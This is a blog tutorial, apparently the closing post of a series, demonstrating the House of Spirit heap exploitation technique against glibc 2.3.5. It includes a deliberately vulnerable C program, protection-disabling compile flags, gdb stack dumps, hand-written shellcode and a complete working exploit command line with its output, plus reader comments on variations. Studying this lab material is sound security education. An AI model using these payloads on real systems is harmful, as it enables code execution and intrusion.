The last technique from the “Malloc Maleficarum” is different from all the others because, among the requirements, there’s a stack overflow.
THE HOUSE OF SPIRIT
Ingredients:
- The attacker can control a location of memory higher than the one he’s trying to change: the exact location depends on the fake size of the chunk we’re free-ing (see third point)
- A stack overflow that allows to overwrite a variable containing a chunk address returned by a malloc() call
- The aforementioned chunk is freed
- Another chunk is allocated
- The attacker can control the content of this last chunk
So, for the first time, the main goal is not to overwrite the metadata of an allocated chunk, but to control the argument passed to its subsequent free() call. In fact, the result of this operation is that an arbitrary address is linked into a fastbin. Another malloc() call would return such address as a chunk of memory: if the attacker can write into this area of memory, then he’ll be able to overwrite important values for the execution flow.
The problem, now, is to decide what this pointer should be overflowed with. In order to correctly look like a fake chunk, it needs a good chunk size field (which is located 4 bytes before the pointer value). Also, as it needs to trigger the fastbin code, it’s required that the size must be less than av->max_fast (set to 64 + 8 by default) AND equal to the normalized size that the following malloc() will request (i.e. the malloc‘s argument + 8). In the end, the stored return address (or whichever thing we’d like to overwrite) needs to be located no more than 64 bytes away from this size field.
Once the free() is called, the following code (glibc 2.3.5 line #3368) is executed:
void public_fREe(Void_t* mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ [...] p = mem2chunk(mem); #if HAVE_MMAP if (chunk_is_mmapped(p)) /* release mmapped memory. */ { munmap_chunk(p); return; } #endif ar_ptr = arena_for_chunk(p); [...] _int_free(ar_ptr, mem);
In this context, mem is the overflowed value we changed, which is transformed into a pointer to the chunk. In order to correctly go on, the size field must not have the IS_MMAPPED and the NON_MAIN_ARENA bits set. If so, the _int_free function is called:
void _int_free(mstate av, Void_t* mem) { mchunkptr p; /* chunk corresponding to mem */ INTERNAL_SIZE_T size; /* its size */ mfastbinptr* fb; /* associated fastbin */ [...] p = mem2chunk(mem); size = chunksize(p); [...] /* If eligible, place chunk on a fastbin so it can be found and used quickly in malloc. */ if ((unsigned long)(size) <= (unsigned long)(av->max_fast) #if TRIM_FASTBINS /* If TRIM_FASTBINS set, don't place chunks bordering top into fastbins */ && (chunk_at_offset(p, size) != av->top) #endif ) { if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0) || __builtin_expect (chunksize (chunk_at_offset (p, size)) >= av->system_mem, 0)) { errstr = "free(): invalid next size (fast)"; goto errout; } [...] fb = &(av->fastbins[fastbin_index(size)]); [...] p->fd = *fb; *fb = p; }
In this segment of code, if the size field was set to a value smaller than 64, the fastbin code is triggered. As you can see, there’s that suspicious if that checks for the size of the chunk next to the one we’re freeing. As the fake chunk’s size must be big enough to include the stored return address (or whatever else we’re trying to overwrite), the size of the chunk next to the fake one must be over the location of the stored return address.
If everything goes fine, then the fake chunk’s address will be put into a fastbin and the next malloc() request (which will be fulfilled by the fake size we set) will return it, allowing the attacker to do its job.
As usual, blackngel, in his “Malloc Des-Maleficarum“, provided us an example that perfectly matches the requirements:
/* * blackngel's vulnerable program slightly modified by gb_master */ #include <stdio.h> #include <string.h> #include <stdlib.h> void fvuln(char *str1, int age) { char *ptr1, name[32]; int local_age; char *ptr2; local_age = age; ptr1 = (char *) malloc(256); printf("\nPTR1 = [ %p ]", ptr1); strcpy(name, str1); printf("\nPTR1 = [ %p ]\n", ptr1); free(ptr1); ptr2 = (char *) malloc(40); snprintf(ptr2, 40-1, "%s is %d years old", name, local_age); printf("\n%s\n", ptr2); } int main(int argc, char *argv[]) { int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0}; if (argc == 3) fvuln(argv[1], atoi(argv[2])); return 0; }
It’s clear that the strcpy on name using a user-defined input allows to overwrite the value of ptr1. Then, at the end, snprintf allows the attacker to write into ptr2 and to complete the exploit. About the modifications I did:
- I don’t know why blackngel put a static attribute to both ptr1 and name variables. Anyway, I removed it, as I was not comfortable into having these variables in the .bss area.
- The pad into the main function is required for two reasons:
- Allow a correct 8-bit alignment for the fake chunk ptr1
- Have a valid size value for the next chunk check in the free (I actually tried with a smaller pad, but ptr1‘s value was ending with \x20 on my machine and I was unable to pass this value in the shellcode)
In order to have everything working, I had to:
- Disable ASLR with the usual echo command
- Boot the kernel with the noexec=off parameter
- Disable GCC’s stack protections
About the third point, it all reduces to:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
So, the first thing to do is to overwrite ptr1‘s value: I will use, for the age parameter, the same value blackngel used in the original paper (48). Now we need a good value for ptr1.
$ ./hos `python -c 'import sys; sys.stdout.write("A" * 32 + "B" * 4 + "C" * 4)'` 48 PTR1 = [ 0x804b008 ] PTR1 = [ 0x43434343 ] Segmentation fault
Right after the strcpy the stack looks like this:
(gdb) x/40x 0xffffcef0 0xffffcef0: 0x00000000 0xffffcf60 0x08048625 0x41414141 0xffffcf00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffcf10: 0x41414141 0x41414141 0x41414141 0x42424242 0xffffcf20: 0x43434343 0x00000000 0xffffcf68 0x080486c0 0xffffcf30: 0xffffd19e 0x00000030 0x00000000 0x00000000 0xffffcf40: 0x00000000 0x00000000 0x00000000 0x00000000 0xffffcf50: 0x00000000 0x0000000a 0x00000000 0x00000000 0xffffcf60: 0xf7e5d000 0x00000000 0x00000000 0xf7cdd943 0xffffcf70: 0x00000003 0xffffd004 0xffffd014 0xf7feb05e 0xffffcf80: 0x00000003 0xffffd004 0xffffcfa4 0x0804a014 PTR1 -> 0xFFFFCF20 PTR2 -> 0xFFFFCF1C (??) local_age -> 0xFFFFCF24 (sadly overwritten with a NUL character) EBP -> 0xFFFFCF28 RET -> 0xFFFFCF2C name -> 0xFFFFCEFC
I don’t know how or why GCC decided to put ptr2 between name and ptr1, but this won’t change much the things. Ok, so, ptr1 needs to be set to local_age + 4 (0xFFFFCF28): in this way, the chunk’s address will be 0xFFFFCF20, and its size field will be right where local_age is stored. We need, anyway, to overwrite local_age with its good value (48 in this scenario), as the strcpy destroyed its assigned value by putting the string terminator character there.
So, the new command line will look like this:
./hos `python -c 'import sys; sys.stdout.write("A" * 32 + "B" * 4 + "\x28\xCF\xFF\xFF" + "\x30")'` 48
Once ptr1 gets the value 0xFFFFCF28 and the malloc() is called again, the value 0xFFFFCF28 will be assigned to ptr2 again. As the return value is stored at 0xFFFFCF2C, this means that the bytes 4-7 of name (the variable that is going to be copied inside ptr2 through an sprintf) need to be set to the desired return value: in our case it’s the beginning of a shellcode stored inside the name variable itself (i.e. the address of name: 0xFFFFCEFC).
As the space inside the name array is very small for my good-old “Pwned!” shellcode, I had to shrink it and adapt to this scenario. Sadly, I had to shorten the printed string to a simple “Pwn”.
section .text global _start _start: xor eax, eax jmp tricky_end db 0xFC, 0xCE, 0xFF, 0xFF ; the new RET value tricky_start: mov al, 4 xor ebx, ebx inc ebx pop ecx xor edx, edx mov dl, 3 int 0x80 mov al, 1 int 0x80 tricky_end: call tricky_start db 'Pwn'
$ objdump -d pwn -M intel pwn: file format elf32-i386 Disassembly of section .text: 08048080 : 8048080: 31 c0 xor eax,eax 8048082: eb 14 jmp 8048098 8048084: fc cld 8048085: ce into 8048086: ff (bad) 8048087: ff b0 04 31 db 43 push DWORD PTR [eax+0x43db3104] 08048088 : 8048088: b0 04 mov al,0x4 804808a: 31 db xor ebx,ebx 804808c: 43 inc ebx 804808d: 59 pop ecx 804808e: 31 d2 xor edx,edx 8048090: b2 03 mov dl,0x3 8048092: cd 80 int 0x80 8048094: b0 01 mov al,0x1 8048096: cd 80 int 0x80 08048098 : 8048098: e8 eb ff ff ff call 8048088 804809d: 50 push eax 804809e: 77 6e ja 804810e <tricky_end+0x76>
Putting all together, we get the expected result:
$ ./hos `python -c 'import sys; sys.stdout.write("\x31\xc0\xeb\x14\xfc\xce\xff\xff\xb0\x04\x31\xdb\x43\x59\x31\xd2\xb2\x03\xcd\x80\xb0\x01\xcd\x80\xe8\xeb\xff\xff\xff\x50\x77\x6e" + "B" * 4 + "\x28\xCF\xFF\xFF" + "\x30")'` 48 PTR1 = [ 0x804b008 ] PTR1 = [ 0xffffcf28 ] 1�������1�CY1Ҳ̀�̀�����Pwn(���(� Pwn$
And that’s actually it: the House of Spirit. This post concludes my trip into the paper that introduced glibc’s heap overflows to the world. I showed how some of the tricks described in it still work nowadays and this has been a lot of fun for me and I really hope you had some when reading all this stuff.
See you soon, guys…
I also setted the PTR1 to the vaule of ‘local_age + 4’ …but it doesn’t work ,I got an error: *** Error free(): invalid pointer: 0xffffd47c ***. Could you tell me how to fix this?
Well, I don’t have many details about your scenario. Did you check the memory layout? Was it the same as mine?
Hello,
In the case of aslr on amd64, is it possible to overwrite only the 12 least significant bits of the pointer ? Those bits corresponds to functions starts in and are aligned (they don‘t vary despite aslr), so by modifying only them, it’s possible to know what function will be called in the executable.
Also, is there an other exploit that works by consecutively calling free on 2 overflowed values ? (though overflowing the second is optional)
Hello, sadly I don’t have (yet) much experience on 64b/ASLR scenarios, so I’m not quite able to answer your question. But, if you can, please let me know about your findings 🙂
it’s unrelated to aslr, instead of overwriting a function pointer completely, you overwrite the least 12 significant bits and leave the last 52 bits unmodified (remember it’s little endian)
or otherwise to you have an idea for this scenario : (32 bits or 64 bits whatever the architecture is)
struct ef ef=malloc(sizeof(struct ef));
ef->buffer=malloc(first_user_controlled_value);
read(fd,ef->buffer,second_user_controlled_value);
ef->eb=malloc(third_user_controlled_value);
read(fd,ef->sb,fourth_user_controlled_value)
free(ef->fb);
free(ef->buffer);
close(fd);
free(ef);
of course the attacker fully control the size of the file and it’s content